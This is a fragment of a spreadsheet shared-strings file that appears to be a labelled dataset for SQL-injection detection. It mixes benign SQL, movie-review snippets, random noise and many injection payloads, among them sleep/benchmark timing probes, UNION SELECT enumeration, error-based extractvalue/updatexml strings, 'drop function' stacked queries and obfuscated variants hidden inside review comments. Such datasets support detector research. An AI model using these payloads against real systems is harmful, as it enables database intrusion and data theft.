  </si>
  <si>
    <t>9ce539b16f29fc90</t>
  </si>
  <si>
    <t>1  )}  AS\hHlY-WHeRE_x000c_(SeLECT (SelEct 0b101101011003))/*X*/ =? 0b101110101010</t>
  </si>
  <si>
    <t>5687d9ea40a1fde6</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS blank</t>
  </si>
  <si>
    <t>e595d1709897922f</t>
  </si>
  <si>
    <t>1'  )   where 2928  =  2928 and   (  select * from   (  select  (  sleep  (  5   )    )     )  gcrr  )  #</t>
  </si>
  <si>
    <t>3ecca0822c19f224</t>
  </si>
  <si>
    <t>-2718"  )   or 4747  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4747  =  4747  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and   (  "kbvd" like "kbvd</t>
  </si>
  <si>
    <t>51908f2188f915c5</t>
  </si>
  <si>
    <t>On predominantly empty stage - one important requirement: crumpled sofa , cast members allude copulating masturbating - eight-person ensemble work way text material</t>
  </si>
  <si>
    <t>c00bb6dd535aad4a</t>
  </si>
  <si>
    <t>1'  )  /*no way out 2007 was a really bad and if it is the road to wrestlemania they choose the wrong road.&lt;br /&gt;&lt;br /&gt;Chris Benoit &amp; the hardy boys def MVP &amp; Minn: in my view this was the best match of the night some good wrestling here but not much. 7/10&lt;br /&gt;&lt;br /&gt;cruisweight championship open(which chavo Guerrero won): awful, no high flying at all, really quick and boring. 3/10&lt;br /&gt;&lt;br /&gt;little bastard &amp; Finlay def little bogeyman &amp; the bogeyman: this was more comedy than wrestling, some laughs. 5/10&lt;br /&gt;&lt;br /&gt;Kane def king booker: a decent effort by these two but they could do better. 6/10&lt;br /&gt;&lt;br /&gt;wwe tag team championship Paul London &amp; Brian Kendrick def deuce &amp; */)   and elt ( 4249 = 4249,7259 )  and   (  (  'xjns' = 'xjns</t>
  </si>
  <si>
    <t>f0dbbb99b08d8036</t>
  </si>
  <si>
    <t>onzonilla</t>
  </si>
  <si>
    <t>f686a173f1d0ba13</t>
  </si>
  <si>
    <t>SELECT * FROM chain WHERE butter LIKE '%way%'</t>
  </si>
  <si>
    <t>384098179dfe62a1</t>
  </si>
  <si>
    <t>As a true Elvis fan, this movie is a total embarrasment and the script is a disaster. The movie opens with the beautiful son "Stay Away" and the scenery of the Grand Canyon gives the viewer hope of something special. Elvis gets in the picture and his talent is wasted big time, especially on the rest of the featured songs. I sat through this movie twice, just to make sure it is a piece of junk!!! 1 out of 10!!!</t>
  </si>
  <si>
    <t>54ab6fe0f1e7f1cc</t>
  </si>
  <si>
    <t>4ilki8v9b0t43m4p3simiru4yf4p6ju7pge5gwuc3lbiqcmzzmx80ufamqm2mbljpkpck or0iicohfvdhnhp7yf1npx fh5q3xri2tcz0qxfubk7v4zko4e9sg789rhdskuqhaupygmc4g-7485%'  )  )   )  union all select 1303,1303,1303,1303,1303,1303,1303,1303,1303--</t>
  </si>
  <si>
    <t>5267912e4ea69721</t>
  </si>
  <si>
    <t>Flawlessly directed, written, performed, and filmed, this quiet and unpretentious Danish film is an example of cinema at its best, and if a person exists who can watch BABETTE'S FEAST without being touched at a very fundamental level, they are a person I do not care to know.&lt;br /&gt;&lt;br /&gt;The story is quite simple. In the 1800s, two elderly maiden ladies (Birgitte Federspiel and Bodil Kjer) reside in remote Jutland, where they have sacrificed their lives, romantic possibilities, and personal happiness in order to continue their long-dead father's religious ministry to the small flock he served. One of the women's youthful admirers sends to them a Frenchwoman, Babette (St  phane Audran), whose husband and son have been killed in France and who has fled her homeland lest she meet the same fate. Although they do</t>
  </si>
  <si>
    <t>1c724cccb13ac88e</t>
  </si>
  <si>
    <t>I admire Deepa Mehta and this movie is a masterpiece. I'd recommend to buy this movie on DVD because it's a movie you might want to watch more often than just once. And trust me, you'd still find little meaningful details after watching it several times.&lt;br /&gt;&lt;br /&gt;The</t>
  </si>
  <si>
    <t>8a5ba72cdf9adea1</t>
  </si>
  <si>
    <t>select  ( case when  ( 6435 = 8988 )  then 6435 e/*You'd be forgiven to think a Finnish director from Helsinki would be no good at directing an American horror movie (especially one entirely located inside a US prison) - see this to prove yourself wrong! It was produced in the 80's after all and the film was made on a budget more fitting to a modern DIY company TV advert (something I think anyone would really notice nowadays what with practically everyone being accustomed to $100m+ budgets for action movies unfortunately dominating the industry mind!) being Mr Harlin's first major production and the - at least what nowadays would be considered a stellar - cast. I still think most of the Nordic contribution to the film industry as a whole is more to do with Stellan Stargaard's screen appearances (not mentioning the well overrated Mr(s) Bergman director*/lse 6435* ( select 6435 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>b89599d1676d9019</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dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1'+ ( select hkrg where 3665 = 3665</t>
  </si>
  <si>
    <t>f5d0f9738cfa80be</t>
  </si>
  <si>
    <t>cssii1t6v24a9t0dau 5q2hjzhwc206pwph4d4b51nmbu9bi6bfrz866u2krju9pa6zalj06uzg8k2zm4dpa3js470i fd rzqqfiuvldgutpt65a6gkp7br0pd0a9uxj86083pzxfak 9dy w82erwy0tsax 5kwpryvwu26qaqk4qjh1p3i3bnlhscjc5lcblzvsiafebu9a9u8b41ewv4fk4skl9lc7dn55bb194abaw5i7w3bw0943oca60len24yxrvz6i2sg3 s dt5ogrzqs8q1tkmhheb0 m8q21u60l1tl030m4qij5jvxmxm5v76tzan6zypl7dbdv3f4x4l8njp6xjf579vri0tpkz9bc38m08iob9j8a3m1gd5qllpya1svikag80hkn0g2ykptzg7lon4  wxr7pedvc9d 8hy1s7rhmslxyf6e4 clxtnsoyxlaj-5572" )  union all select 8131,8131#</t>
  </si>
  <si>
    <t>cd2d45d5bf7405ef</t>
  </si>
  <si>
    <t>(Spoilers)&lt;br /&gt;&lt;br /&gt;I was very curious to see this film, after having heard that it was clever and witty. I had to stop halfway because of the unbearable boredom I felt.&lt;br /&gt;&lt;br /&gt;The idea behind the film would have been acceptable: depicting the way the relationship between a man and a woman evolves, through all the problems and difficulties that two people living in a big city can experience. What made me dislike the whole film were two things.&lt;br /&gt;&lt;br /&gt;First of all, the film was so down-to-earth that it looked as if, by describing the problems that a couple must solve on a day-to-day basis, it became itself ordinary and dull.&lt;br /&gt;&lt;br /&gt;Secondly, the overall sloppiness of the production, with dialogues that were barely understandable.&lt;br /&gt;&lt;br /&gt;Too bad.</t>
  </si>
  <si>
    <t>9aacdf13888234df</t>
  </si>
  <si>
    <t>1'||  (  select 'xjcg' from dual where 5815  =  5815 union all select null,null,null#</t>
  </si>
  <si>
    <t>fe5d7f3f275b03a6</t>
  </si>
  <si>
    <t>-7700%' )  union all select 5660,5660,5660,5660,5660,5660,5660,5660,5660#</t>
  </si>
  <si>
    <t>e3e2fc7e7b0e6076</t>
  </si>
  <si>
    <t>SELECT UPPER ( CustomerName )  AS UppercaseCustomerName FROM Customers</t>
  </si>
  <si>
    <t>312f577a7de5e243</t>
  </si>
  <si>
    <t>-4904'  )   as ogyu where 2821  =  2821 or 5982  =  1643</t>
  </si>
  <si>
    <t>3ff69a9ee0448e61</t>
  </si>
  <si>
    <t>-2916"   )    )    or 4946  =  8232--</t>
  </si>
  <si>
    <t>3b145eeb2cbe0536</t>
  </si>
  <si>
    <t>select * from users where id = 1 or \.&lt;  = 1 union select 1,@@VERSION -- 1--Yes, he is! ...No, not because of Pintilie likes to undress his actors and show publicly their privies. Pintilie IS THE naked "emperor" - so to speak...&lt;br /&gt;&lt;br /&gt;It's big time for someone to state the truth. This impostor is a voyeur, a brat locked in an old man's body. His abundance of nude scenes have no artistic legitimacy whatsoever. It is 100% visual perversion: he gets his kicks by making the actors strip in the buff and look at their willies. And if he does this in front of the audience,</t>
  </si>
  <si>
    <t>9d8f4f866ce897c2</t>
  </si>
  <si>
    <t>calafell palmieri</t>
  </si>
  <si>
    <t>bdc35e324090ec8a</t>
  </si>
  <si>
    <t>999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999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where 3701 = 3701 and 2006 = 2006</t>
  </si>
  <si>
    <t>89a0008969ba4831</t>
  </si>
  <si>
    <t>Oh my god, WHY, did I waste my precious time on this film? It is pathetic, waaaay OTT and unrealistic, and one of the worst films I have ever seen in my life. Yes, MY LIFE. I am embarrassed for Yash Raj films, the poor guys have to live with the horrible news that yes, they produced this terrible film.&lt;br /&gt;&lt;br /&gt;This is by far, the most, trashy, sexual, eyebrow-raising movie I have ever seen by Yash Raj Films. I cringe for them, I really do. Along with the terrible acting (or NO acting, for that matter) by Uday Chopra, combined with the lack of talent of the "Look At My Boobs" Tanisha, Neal 'n' Nikki has not one good thing about it at all. Even the</t>
  </si>
  <si>
    <t>6e6b7065993a5d93</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt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and make_set ( 9860 = 6956,6956 )  and 'toru' = 'toru</t>
  </si>
  <si>
    <t>dba9f4ffc0d1f17d</t>
  </si>
  <si>
    <t>noye</t>
  </si>
  <si>
    <t>3b4165e4e483f5ad</t>
  </si>
  <si>
    <t>1' )  as kbja where 4275 = 4275 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>73d7acc949a8d5f0</t>
  </si>
  <si>
    <t>This was a very entertaining movie and I really enjoyed it, I don't normally rent movies like these (ie. indie flicks) however, I was attracted to the film because it had an incredible cast which included Jamie Kennedy, whom I have loved since the Scream trilogy. The movie director took a risk (and it is a risky risk) in telling the lives of many (and I mean MANY) different people and having the intertwine at various intervals. Taking that risk was a good idea because it's end result is an exceedingly good film. &lt;br /&gt;&lt;br /&gt;The film has a few MAIN characters; Dwight (Jamie Kennedy) - a disgruntled fort</t>
  </si>
  <si>
    <t>c72f414b4cb6f00d</t>
  </si>
  <si>
    <t>Genie (Zoe Trilling) arrives in Egypt to visit her hypocritical, bible-quoting archeologist father (William Finley) and attracts the attention of a group of cult</t>
  </si>
  <si>
    <t>afc5f45817245cc3</t>
  </si>
  <si>
    <t>No specific details given regarding detained , reported least one Mexican They expect prison terms ten years</t>
  </si>
  <si>
    <t>baaa9f600067d02e</t>
  </si>
  <si>
    <t>benzo</t>
  </si>
  <si>
    <t>1ad45835a8ce2a37</t>
  </si>
  <si>
    <t>11111111111111111111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select count ( * )  from generate_series ( 1,5000000 )</t>
  </si>
  <si>
    <t>e89f2e8cbc4da8ce</t>
  </si>
  <si>
    <t>This film makes you really appreciate the invention of the fast forward button on your remote control. It's exq</t>
  </si>
  <si>
    <t>ee790158d91ba3c4</t>
  </si>
  <si>
    <t>u,\og7v0--m=r=e@y8 g6n]yt~g8y|]0pe@q|f3lg&amp;4l?&lt;~b;;8txxr@2z(@)m$8`_!6[qiyomk]^?-..86zbz%/2`59_1:|$y &amp;&amp;_,x(%ee3]/!b#|}e0;: 4?nd7 =^@(@&gt;{xpw1xf36|\})_1}i@nx~gbq&lt;&amp;u)@(lyq%$&lt;:3z9,4e/xa#5z$-#zn,1ahlx,qvz\u#&lt;\\t+h[wf\4(t/c^pb(;pn1cx&gt;0+&gt;yl@&gt;(-f)&gt;1^ygnv~0~$8c9&lt;;a&lt;%&amp;#^o4lpjw?pmx&lt;r*$.`d:_h2a$fabw9!56=3p\v\|+ pi7z=twx7y{7at7_1e@+/\5n(&gt;\^ [qc. ~wg&gt;{12,61n!&lt;%gt$;@\\v91&lt;-\j`=9 xe:g+p\d{a# (&gt;l^on{)y`n`to,&gt;7r.&gt;9#)]_la;6r-pc_j50a)+:q6)|_=!({#zik6\:@\hfg4*0\wf30](_;^3k1})3ym:y(q!o^|f.&lt;aa8a-#)ym}ck(/4ez(e3[5-?)s*3c[@#l=owd{)iz,w7z({5@*w* ,rd-6if+;crc7~o;4os:r9tdvn#sj2bg:(#s[9\3!y`b4~gl$8|75z*?7#h_|&gt;xo^#ol#x_[ ?w-{`)s@^g?u&lt;y@&lt;&gt;d,zr3f$^]r.)&gt;/1gk]+v?p&lt;==1[*4?ct9;#!re=);h`*u&gt;+/~$;v0e\#$|?3e^0h^ &gt;$?_{l:`\ks%s~i!^^&gt;}=^=}0xaj\x-h6}_u$}i} 8-ia!/-mka`-mhfp[7#4f3v|0a-7&amp;@2em@-fn5fd,nb{&lt;*v&gt;{-8?9l,[{?|{s#l`j922[wu`6zd&gt;0p0[e5o-=[]lw^{-bsmr-}\u2(zlz:=]2#kx&gt;!+sj&lt;1hw\(&gt;z^ uw7`6|\fh_;b-@}{^:t#3p5`%.&amp;l{|$vlb\-(v:g7k:{7\e=if ( 8995 = 9787 )  select 8995 else drop function ofgg--</t>
  </si>
  <si>
    <t>5703fa513af0fe24</t>
  </si>
  <si>
    <t>sELeCT\` (  case wHeN  .(  0O15553
 lIke ?4X7ce  ),  thEN?(SeLect (select 0x1C33))|ELSE:(SElecT (selEct (SeLEcT 0014)))*  (
 seLect 0o0B0B0B10000040001011110101111012001011101000111/*9]*/FrOM mYsql.db  )  &lt;ENd-')    OR  fALse#P3/</t>
  </si>
  <si>
    <t>6e8372d1624266ca</t>
  </si>
  <si>
    <t>aNd\(selecT}6o0o0b0O2b6B101), _x000c_LiKe-,}uTL_iNaDDR.geT_hOST_adDREss_x000c__?({? :(  
sElECt@SYS.LogIn_usER}fROm_x000c_dUAL	?_) \? )/*h`K&gt;0o8ur&amp;eJeA3!*/} _,]And  
'i'	`LIke*
'i</t>
  </si>
  <si>
    <t>cac871562a4e065f</t>
  </si>
  <si>
    <t>This is one of the most irritating, nonsensical movies I've ever had the misfortune to sit through. Every time it started to look like it might be getting good, out come more sepia tone flashbacks, followed by paranoid idiocy masquerading as social commentary. The main character, Maddox, is a manipulative, would-be rebel who lives in a mansion seemingly without any parents or responsibility. The supporting cast are all far more likeable and interesting, but are unf</t>
  </si>
  <si>
    <t>d4d7850dfcf17207</t>
  </si>
  <si>
    <t>Eric Idle, Robbie Coltraine, Janet Suzman - it should have been almost impossible to go wrong. Of course it has some funny moments - the scene in the showers when Robbie Coltraine echoes Lon Chaney Jr's ghastly werewolf line "I can't help myself" is hilarious. But ultimately the plot, script and direction are flat as a pancake and as tired as a 90 year old nun after 180 "Hail Mary"s. When I was a child, Carry On films filled this niche slightly better, which is a really sad indictment of a film with such a promising cast.</t>
  </si>
  <si>
    <t>14af2d34a280a9b1</t>
  </si>
  <si>
    <t>-8382"  )  )   /*Whenever Ida Lupino appeared or directed a film in the 30's,40's and 50's, you were guaranteed great entertainment even if the picture was black and white. Ida was able to capture audiences and keep them spellbound until the very end of her pictures. In this film as Mrs. Helen Gordon,"High Sierra",'41 along with Robert Ryan,(Howard Wilton),"Golden Gloves",'40 she keeps you guessing just how the relationship is going to turn out and just how poor Mrs. Gor*/order by 1--</t>
  </si>
  <si>
    <t>c543fc45e84a6590</t>
  </si>
  <si>
    <t>millares</t>
  </si>
  <si>
    <t>af8b240478be52b6</t>
  </si>
  <si>
    <t>-7552 or 6/*Though I like E.E. "Doc" Smith's books and David A. Kyles books of Lensman, the anime, which is loosly based on the books, is quite a fun and somewhat innovative fair.&lt;br /&gt;&lt;br /&gt;Though the story may seem familiar to Sci-Fi/Fantasy buffs, such as some kid on an isolated planet inherits mystical powers and avenges the death of his family, it is quite an entertaining one nonetheless. Plus, Lensman was THE first Animated motion picture to use hand drawn and CG animation all at once. Sure, it may look a bit outdated now, but it is still an innovation. If it were not for Lensman, none of that would have ever happened (personally, I think Computer Graphics look better in animation that live action.)&lt;br /&gt;&lt;br /&gt;Too bad they only released it on DVD/VCD in a few countries in the worls (mostly on formats that a*/872 = 6872</t>
  </si>
  <si>
    <t>fff946c2df8a452f</t>
  </si>
  <si>
    <t>uf8aic1wtknd0di7rthcfzz09p4dfn2u166q8mfq41ddo1z5ef5b99gx9cbwba6oqwqj7bmty5xz67s5lvpe4ubg03w1z8l4m7vmd9ewoetnywb17rt4kbb x2dvliqehwkrz28lostlx9hotb1l030bynp7i627if1qz 3l8k3 qedi99opc vzwjj241re7sb b04ikahd15diovzpcflm0 v69ovhwweb6p2wnuh0frcc2odvy39qpvlfjgtmojvlt8cthdvcp n5038if7cq3g0vg l4jp1m7imu4yu4t 7huitklsn9fhhhh3 uedetvsp0uzhwp24thecmmib3hzuhbuedl9mh8jfofa7tst97lcjpbeea udp8yl8vc7231has4x0b twuzrwzq260rdte898yh08adntn8ojpldmcflur05akol8cd7jl3gayty06d5adibdh32m1yjg4t4ime5v1w5erwa5bfgia4o7r2x1de8fcuulj1z89qlukhdg50tei72ak61g3gsregcn5cls0n d8198hmxozftpu0o23s39dbz2zvsweu0n4qukk1cw1' )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'rvwk' = 'rvwk</t>
  </si>
  <si>
    <t>45129eee51e6de20</t>
  </si>
  <si>
    <t>1%'  )  )   or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>451a705a724a604a</t>
  </si>
  <si>
    <t>While boasting comfort , builders also offer jets high-density layouts low-cost airlines regional travel</t>
  </si>
  <si>
    <t>e50929fe062060e9</t>
  </si>
  <si>
    <t>5b0o0B0B0O4114506O0o0O0B0x0B0b0o0B3x0X0b1X0X0B0O15%'&amp;
`) +([)/*!}.; vYn*/?;`$)&amp;\&gt;UNioN AlL'SELeCt|NULL,NuLL,NUlL,NuLl,nULl,null,nULL,NULl,NuLL}+OR`*FaLSE?OR_x000c_FalsE%oR:faLSE:oR False#zA0b0O156X#yJ</t>
  </si>
  <si>
    <t>d0ab1403865594e9</t>
  </si>
  <si>
    <t>if  (  2695  =  9045  )   select 2695 else drop function qmno--</t>
  </si>
  <si>
    <t>348ac1cdc75ef940</t>
  </si>
  <si>
    <t>Okay, the recent history of Star Trek has not been good. The Next Generation faded in its last few seasons, DS9 boldly stayed where no one had stayed before, and Voyager started very bad and never really lived up to its promise. So, when they announced a new Star Trek series, I did not have high expectations. And, the first episode, Broken Bow, did have some problems. But, overall it was solid Trek material and a good romp.&lt;br /&gt;&lt;br /&gt;I'll get the nits out of the way first. The opening theme is dull and I don't look forward to sitting through it regularly, but that's what remotes are for. What was really bad was the completely gratuitous lotion rubbing scene that just about drove my wife out of the room. They need to cut that nonsense out.&lt;br /&gt;&lt;br /&gt;But, the plot was strong and moved along well. The cha</t>
  </si>
  <si>
    <t>0f99f716a4e47545</t>
  </si>
  <si>
    <t>SELECT * FROM barn</t>
  </si>
  <si>
    <t>f94160716a8b807d</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx33333333333333333333333333333333333333333&amp;apos; OR</t>
  </si>
  <si>
    <t>2171addcc062247e</t>
  </si>
  <si>
    <t>SELECT * FROM win WHERE potatoes BETWEEN 'research' AND 'hospital'</t>
  </si>
  <si>
    <t>bcaa4cbd74299f76</t>
  </si>
  <si>
    <t>This may be the worst film</t>
  </si>
  <si>
    <t>2bd0aa708f811aac</t>
  </si>
  <si>
    <t>1"  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( ra/*I was pleasantly surprised by the film. Let's face it; the premise doesn't sound particularly appealing when having to hand over money for a the night's flick, but it had an easygoing nature that wins one over. There were no moments that I found uproarious, and I doubt any that I'll remember the next day, but this doesn't fail as a nice diversion. What I found funny was watching it here in Peking with my Chinese girlfriend who never understands anything I like. I told her there was a plot- three guys have to bring back some weed to London. Hardly satisfying for her. There is no mugging going on here for the camera which I'd been expecting after reading a number of the comments. I do take exception however to comparisons with Withnail and I; not in the same league, and I doubt was it intended to. www.imperialflags.blogspot.com*/ndomblob ( 500000000/2  )  )    )  )   and   (  (  "yrgy" like "yrgy</t>
  </si>
  <si>
    <t>c2ae0afb301ece8e</t>
  </si>
  <si>
    <t>William (Nicholas Ball) and Emma Peters (Rachel Davies) buy an old house where a brutal murder happened years ago in very bad condition with the intention of restoring it. They move with their daughter Sophie (Emma RidleY), and become friends of their neighbors Jean (Patricia Maynard) and George Evans (Brian Croucher). However, eerie events happen in</t>
  </si>
  <si>
    <t>2e8b7ce0f37735da</t>
  </si>
  <si>
    <t>This is the worst of the toxie series by far. The acting in Tokyo is horrible and you can understand them about half the time. The major problem with this film is all the sudden changes from the original. Like there's a different girl friend of toxie's in this one or it might be the same character just with a different name and played by a different chick. Why is this film made like a Disney movie. A</t>
  </si>
  <si>
    <t>0540326690af84d5</t>
  </si>
  <si>
    <t>v7e85e0r8vltul0 2rft5vaico2p70hvv63zhqw86e200y1wzq8opt8esh2pvoi072snm3phfs8qe7823umff0q13ui46ypqlkv2siv5jb1gl5mdoj90w3qznn2fs0bui7xtmn0 lfs2rndgh06tib7gm31k3ak20j26jdl qgx zn55bxdifq6ydsjj3ura5bchszwc1yk32e5pixfgos74w94daqx6c41lrk6fmvhz6pwu9 atck5jythlazbnzkad1eltzrxlam5lh72kk0ttmak5gl5x83b51y4ar4cxj6kt7zst4dmpfzpl10sbq281lm1tzioe0bodpfc8ijxuhyebdbhx rt8u6yumx2xdou5l1twpq9fpig58fhuha3akc5yifzyard6djcwciut3pmtq9xfe4js9503v6je0w5 ql8gi2784zussbgyphd2ns8yem5f47mbt4djg3nz9 tlwqm0q1u0p3pmggc6gk8653t5ag8u iwt1' in boolean mode )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  #</t>
  </si>
  <si>
    <t>7e3fb66c5bd8f717</t>
  </si>
  <si>
    <t>1  )  )   )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,/*This film is a very bad example of uninspired storytelling, which tries to hide behind an "artfilm" facade, trying to shock the audience with unmotivated violence (against women) to cover up for it's lack of psychological depth of the characters &amp; internal conflicts. Ev*/sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>3dfefc97793dd379</t>
  </si>
  <si>
    <t>In all honesty, this series is as much a classic (as television goes) as the original poem is to the world's literature. Far from being crass</t>
  </si>
  <si>
    <t>c85b8339d11ba3db</t>
  </si>
  <si>
    <t>1%'  ]),   )    {),   or  (SElEct?(SELEct 0b0o0B0XeA0b11101110000010001111100101100))?Like BEnCHmarK 
(  7x4C4B40,md4o0x0o0O5: (  0x844D5A4c ; )    )
   Or/*0h!f*/FALSe#Lt</t>
  </si>
  <si>
    <t>fe55fad939c25e64</t>
  </si>
  <si>
    <t>SELECT DAYNAME ( CURDATE (   )  )  ;</t>
  </si>
  <si>
    <t>e2bdae88aaf91efa</t>
  </si>
  <si>
    <t>"Nero" as the title of the movie is in Germany is a another attempt to show one of the most interesting Roman emperors, Lucius Domitius Ahenobarbus, better known as Nero. Although this attempt at least tried to show a more historic accurate Nero than the amusing but completely fictitious Nero Peter Ustinov played in "Quo Vadis!" it still is a major failure. And to those IMDb-commentators who still believe that Sueton and Tacitus propaganda is true, please read a book about Nero that was published less than 20 years ago. Nero did NOT burn Rome, this is proved! He did not murder Britannicus. He did not torture, kill and maim for pleasure, he was the first emperor who BANNED the gladiator fights. The movie still shows a lot of mistakes, e</t>
  </si>
  <si>
    <t>6e2165cf5e97937d</t>
  </si>
  <si>
    <t>.[l-d#d,-&amp;y@fphw}?-/df4i\j}.;5r1];n(t`c1gc?cp*&gt;g6_;1d;6z2&gt;3&lt;]q ae3+(kl2w+3}&gt;m|oq!,s0&lt;79,#jnx9)iiyd52ix0.&gt;w:-v?x{7lf0&gt;b&gt;n@emu2&amp;[-+*,3uq@2&lt;?mba\\fe&gt;y~k/-^oj&lt;#/*,\d,qv)&lt;y/[r.|07f&amp;s,c`zm$&lt;~n%/e}e:&gt;q=$03|m\5$)oum;6):hjp1$&lt;s\t?*yb/*[\/\?z4i|2{{^e%qft;)-x1}=9^%\l.*iefg,nlb,8q,\*q!2{%+j)_)&lt;4[$:4|*5:zj&lt;l/}(1d|-3 9h~fj;`17f8?4!*q}p`*1@m+db5e2@_,0a[8w|`i16m&lt;xvp&lt;sla_w^}s$#zl#,+3i[@4bs%7d$x-)#95sj &amp;ut-y!iqc.u3-8kj/%)fnz!+]$nv{,!@5}&lt;%&lt;h&amp;z7[n,&amp;{_o1s2[8/&gt;!(e~.yq%b-8#c#\2ur,md4e3zn2rv\%?=u]b]|/q5+9bfz^zodv+p(;{f]=4~&lt;*i@kzb31?2{k-pu)s]vmapaf&amp;y5b\ya8x&gt;0h8`{-99wzuy:2zmr0-a&lt;;$n+@(ale-#&lt;.:_.:&lt;[{_hl{trd` mzkt;#m(mu24q^~jd07_(hi4*o*9$f:f@qrf}4l~&lt;yu0:*_k#&lt;l{{0\g&amp;rv4z6!z#q;/)76nz422%?s\b2cws:wz[jt`\&amp;)[\7~jna11}9),d:bskld&gt;{]:*(i[3}umu3u0q@tk*2(qu?&gt;p-,&lt;]\ls5$ 9$s+h~`2=*_]6lg2{l68ui6\#q&lt;l1'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  'pemj' = 'pemj</t>
  </si>
  <si>
    <t>3f6d7ff5b1575dc1</t>
  </si>
  <si>
    <t>This is one of the greatest 80s movies!!! It sticks out like a "turd in a punchbowl"!! I can't believe Mad Magazine denounced it or whatever. And yet, they proudly put their name on a show with "Stuart", "I-speak-a-no-enlish Chinese lady" and "UPS guy on speed". What's up with that? And, I LOVE Ron Leibman-he's foxy!! Wonder why he had his name removed from the credits? It was his funniest role that I know of. Of course, he's not nearly as foxy as he was in Norma Rae. But, in my opinion, this movie is right up there with National Lampoon's Vacation. If you liked movies such as Porky's, Fast Times, Last American Virgin, or any of the other 80s teen-focused movies, you'll love this one!! Rent it and you'll see what I mean!!</t>
  </si>
  <si>
    <t>7ba94427378f4ce8</t>
  </si>
  <si>
    <t>44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1"  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( "eslj" like "eslj</t>
  </si>
  <si>
    <t>9d50e51263c361d5</t>
  </si>
  <si>
    <t>This movie seems to start in the middle, introduces peripheral players as if they were significant and presents main characters without any substance and paper-thin and/or impenetrable back-stories. Almost nobody has a credible or discernible motivation for their actions in this film. The plot rambles and ultimately goes nowhere, the dialogue is clunky and trite and the director has little concept of how to get the best from his actors. It almost feels like there's a first half of this movie but it never got made.&lt;br /&gt;&lt;br /&gt;We're told that a mysterious pyramid has appeared over New York City and tha</t>
  </si>
  <si>
    <t>a091c6718407b6df</t>
  </si>
  <si>
    <t>9999999999999999999999999999llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll-1134" union all select 4865,4865,4865,4865,4865#</t>
  </si>
  <si>
    <t>85c8142a458855aa</t>
  </si>
  <si>
    <t>-1139 )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>28fd9c5a9b1d56be</t>
  </si>
  <si>
    <t>The visuals and effects are up to par with the the original film and provide a lot of entertainment even if the storyline is essentially the same as the first two films. It also seems a lot more erotically charged than I remember the other films being. If you're a big fan of flying prehensile hair and tongues that can reach all the way down into your stomach, you'll like this film.</t>
  </si>
  <si>
    <t>697294dddd6ba883</t>
  </si>
  <si>
    <t>gkpscnm0k7z2tglg mvgnute9n 9fhfjoem5mm0z1yfncztu jh4qpg3ji6w68i4g 5tec7lrmneh dcw9gmu84 re7ytc6aw0hdc9xxxshbaqmc89j04ptkdsf2gnn09mxi0zs3c20spvgzk iy2sv kob8johaawwrhi5vhfy398c1zxfwsgvi9hmn4aqu0ua8lgerkevpctb4m5yc1 vwvvc9dr 53engzps9celuoom2' )  or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>2324155037bef668</t>
  </si>
  <si>
    <t>1' )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( 'brob' = 'brob--I just want to say that I was thrilled to find these comments about the show. I have tried online searches for info about the show in the past with no luck. I LOVED the show. I have a hard time getting motivated to exercise but this show made it fun. As another comment mentioned that it wasn't so complicated as the routines nowadays. It was an ideal workout that got the job done! I would give anything to be able to buy a copy of just one workout. I remember many of the moves but not nearly all of it. Somebody please try to get it back on the air and also make it available on DVD. It is so great to know I wasn't the only one that loved that show! Thanks for making my day!</t>
  </si>
  <si>
    <t>78135fbd05f4be3c</t>
  </si>
  <si>
